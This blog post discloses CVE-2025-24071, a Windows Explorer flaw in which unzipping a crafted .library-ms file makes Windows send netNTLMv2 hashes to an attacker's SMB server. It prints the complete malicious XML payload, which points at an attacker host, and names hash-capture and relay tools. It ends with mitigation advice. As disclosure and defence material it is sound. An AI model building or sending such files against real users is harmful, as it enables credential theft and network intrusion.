CVE-2025-24071 - Filter netNTLMv2 Credentials with a simple ZIP

In this blog post, a proof-of-concept (PoC) is presented that demonstrates how a malicious .library-ms file can be used to capture netNTLMv2 credentials without the need for the victim to interact with the file. Simply unzipping the file is enough to trigger the vulnerability.

Vulnerability Description

Vulnerability CVE-2025-24071 is a critical flaw in Windows Explorer, the default file manager of the Windows operating system. This vulnerability arises from insecure behaviour in the handling of compressed (ZIP) files containing a Windows library file with a .library-ms extension. When a user unzips a malicious ZIP file, Windows Explorer automatically processes the embedded .library-ms file, which triggers a Server Message Block (SMB) connection to a remote server controlled by an attacker.

The most concerning aspect of this vulnerability is that it does not require any user interaction (e.g. clicking on the file), as the malicious action is executed in the background during decompression. As a result, the victim’s system sends the authentication credentials in netNTLMv2 format to the attacker, which could allow the attacker to perform an authentication relay attack (NTLM Relay) or attempt to decrypt the credentials using brute-force techniques.

Potential impact:

  • Credential theft: An attacker could capture NTLMv2 hashes and, in environments with weak password policies, crack them offline.

  • Lateral movement on corporate networks: If the affected user has privileges on an internal network, the attacker could escalate access.

  • Remote Code Execution (RCE): In combination with other vulnerabilities, RCE could be achieved.

Proof of Concept (PoC)

1. Preparation of the Malicious File

To exploit this vulnerability, we must first create a .library-ms file with the following malicious XML content:

<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation>
        <url>\\192.168.0.1\shared</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>

This XML file contains a reference to a remote SMB resource (\\ATTACKER-IP\shared) that the system will automatically try to contact when the file is processed by Windows Explorer. We then compress this file in ZIP format for distribution.

Creation of the malicious file

Distribution and Execution

The attack vector is surprisingly simple: the attacker distributes the ZIP file to the victim via any means (email, messaging, download sites, etc.). What is critical about this vulnerability is that it does not require the user to open the malicious file. By simply unzipping the ZIP, Windows Explorer automatically processes the contained .library-ms file, attempting to establish an SMB connection to the server controlled by the attacker.

Malicious ZIP decompression process

Credential Capture

On the attacker’s server, an SMB listener is configured using tools such as responder, ntlmrelayx or Inveigh to intercept and log the netNTLMv2 hashes sent by the victim’s system during the authentication attempt. These hashes can subsequently be:

  • Subjected to brute-force attacks to recover the password in clear text.
  • Used in NTLM Relay attacks to escalate privileges or move laterally in the network
  • exploited to establish authenticated sessions on systems that accept this type of authentication

Successful netNTLMv2 credential capture

Mitigation

To protect systems against the vulnerability CVE-2025-24071, the following measures are recommended:

  1. Install security updates: Immediately apply the security patches released by Microsoft for this specific vulnerability.

  2. Configure group policies:

    • Disable SMB outbound in corporate environments where possible.
    • Implement firewall rules that block unauthorised outbound SMB connections.
  3. Good security practices:

    • Avoid unzipping ZIP files from untrusted sources.
    • Use up-to-date anti-virus solutions that can detect these types of threats
    • Consider using isolated environments to examine suspicious files.
  4. Network monitoring: Implement intrusion detection systems capable of identifying attempts to exploit this vulnerability.

Microsoft has classified this vulnerability as critical and recommends updating all affected systems with high priority.

Conclusion

Vulnerability CVE-2025-24071 highlights the importance of keeping systems up-to-date and being cautious when handling compressed files from unknown sources. Exploitation of this vulnerability can occur without the user directly interacting with the exploit.

References